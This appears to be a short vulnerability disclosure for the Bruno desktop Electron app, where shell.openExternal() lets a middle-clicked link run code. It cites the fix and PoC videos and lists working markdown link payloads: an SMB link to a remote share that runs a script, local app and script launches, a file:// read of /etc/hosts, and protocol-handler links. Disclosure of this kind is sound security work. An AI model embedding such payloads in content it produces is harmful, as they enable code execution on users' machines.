Reported by: Rodolfo Tavares ~ opcod3r
Bruno Desktop Electron app opens new windows using shell.openExternal(). This allows an attacker to gain remote code execution on a user's computer if they middleclick a malicious link. This vulnerability allows an attacker to execute code on the victims machine. The victim has to interact with the link though and sees the URL that is opened. fixed https:/github.com/usebruno/bruno/pull/3122/files
POC Linux: https://youtu.be/SPCGVLEfVgw
POC Windows: https://youtu.be/KVwKQkXA-vI
POC MacOS: https://youtu.be/S0W93tbKaFY
- ` [calc](/System/Applications/Calculator.app)` – Opens Calculator on macOS.
- `[calcFile](System/Applications/Calculator.app)` – Another method to trigger Calculator on macOS.
- `[exploit1](smb://10.211.55.6/public/hello.scptd)` – Connects to a remote SMB share and executes a script.
- `[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt)` – Executes a script from a mounted volume on macOS.
- `[file](///etc/hosts)` – Reads the system’s `/etc/hosts` file on macOS/Linux.
- On Windows, the same type of attack can be executed with the link: `calc.exe` to launch the calculator or potentially other malicious payloads.
- **Protocol exploitation:**
- `[facetime1](facetime:+123456789)` – Attempts to launch FaceTime with a specific phone number.
- `[facetime2](facetime:someone@example.com)` – Triggers FaceTime using an email address.
- `[tel](tel:+123456789)` – Initiates a phone call via the `tel:` protocol.
- `[mail](x-apple-reminder://)` – Opens the Apple Reminders app via a custom protocol.
- `[calendar](calendar://)` – Attempts to open a calendar application.
More info, you can watch the videos :)